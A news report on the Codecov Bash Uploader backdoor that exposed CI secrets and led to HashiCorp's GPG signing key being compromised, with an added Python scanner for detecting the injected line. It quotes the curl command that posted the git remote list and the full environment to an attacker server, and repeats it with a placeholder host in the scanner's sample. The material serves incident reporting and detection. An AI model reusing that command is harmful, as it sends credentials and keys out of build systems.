Malicious code inserted into the Codecov script led to the compromise of a HashiCorp PGP key.

HashiCorp, known for developing the open source tools Vagrant, Packer, Nomad and Terraform, has announced the leak of the private GPG key used to create the digital signatures that verify its releases. Attackers who obtained the GPG key could make hidden changes to HashiCorp products and certify them with a valid digital signature. At the same time, the company stated that its audit found no traces of any attempt to make such changes.

The compromised GPG key has now been revoked and a new key has been introduced in its place. The problem only affected verification using the SHA256SUM and SHA256SUM.sig files; it did not affect the generation of digital signatures for the Linux DEB and RPM packages delivered via releases.hashicorp.com, nor the release verification mechanisms for macOS and Windows (AuthentiCode).

The leak resulted from the use of the Codecov Bash Uploader (codecov-bash) script in HashiCorp's infrastructure; the script is designed to upload coverage reports from continuous integration systems. During the attack on the Codecov company, a backdoor was hidden in this script, through which passwords and encryption keys were sent to a server controlled by the attackers.

For the hack, the attackers exploited an error in the build of the Codecov Docker image, which allowed them to extract the credentials for GCS (Google Cloud Storage) needed to modify the Bash Uploader script distributed from the codecov.io website. These changes were made back on January 31, went unnoticed for two months, and allowed the attackers to harvest information stored in the continuous integration environments of Codecov customers. Using the added malicious code, the attackers could obtain information about the Git repository under test and all of its environment variables, including the tokens, encryption keys and passwords passed to continuous integration systems to grant access to application code, repositories and services such as Amazon Web Services and GitHub.

Besides being invoked directly, the Codecov Bash Uploader script is used as a component of other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, whose users are also affected by the problem. All users of codecov-bash and related products are advised to audit their infrastructure and to rotate passwords and encryption keys. The presence of the backdoor in the script can be checked by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
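A defender's check for the indicator line above, written as an added example (not code from the article or from Codecov): it scans a local copy of a codecov-bash script for a curl command that embeds the full environment ($(env)) together with the git remote list or posts to an /upload/v2 endpoint. The two embedded scripts are constructed samples, and the attacker host is a placeholder, since the article does not give it.

```python
import re
import sys

# Constructed sample resembling a codecov-bash excerpt with the injected line.
# The host is a placeholder; the article prints the line with the host removed.
INJECTED_SAMPLE = '''#!/usr/bin/env bash
set -e
say "Uploading reports"
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKER_HOST_PLACEHOLDER/upload/v2 || true
curl -X POST --data-binary @"$upload_file" "$url/upload/v4"
'''

# Constructed sample of a script without the injected line.
CLEAN_SAMPLE = '''#!/usr/bin/env bash
say "Uploading reports"
curl -X POST --data-binary @"$upload_file" "$url/upload/v4"
'''

# Indicators taken from the line quoted in the article: the whole environment
# is exfiltrated via $(env), combined with the git remote list, to an
# /upload/v2 endpoint (the host may have been stripped, hence the optional space).
ENV_EXFIL = re.compile(r'\$\(\s*env\s*\)')
GIT_REMOTE = re.compile(r'\$\(\s*git\s+remote\s+-v\s*\)')
UPLOAD_V2 = re.compile(r'https?://\s*\S*/upload/v2')


def find_exfil_lines(script_text):
    """Return (line_number, line) for every curl line matching the backdoor pattern."""
    hits = []
    for n, line in enumerate(script_text.splitlines(), 1):
        if 'curl' not in line:
            continue
        if ENV_EXFIL.search(line) and (GIT_REMOTE.search(line) or UPLOAD_V2.search(line)):
            hits.append((n, line.strip()))
    return hits


def scan_file(path):
    """Scan one file on disk, e.g. a cached codecov-bash copy on a CI runner."""
    with open(path, encoding='utf-8', errors='replace') as f:
        return find_exfil_lines(f.read())


if __name__ == '__main__':
    for p in sys.argv[1:]:
        for n, line in scan_file(p):
            print(f'{p}:{n}: possible codecov-bash backdoor: {line}')
```

A hit means the environment of every CI job that ran that script should be treated as exposed, which is why the article advises rotating the affected secrets rather than only removing the line.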

Source: opennet.ru
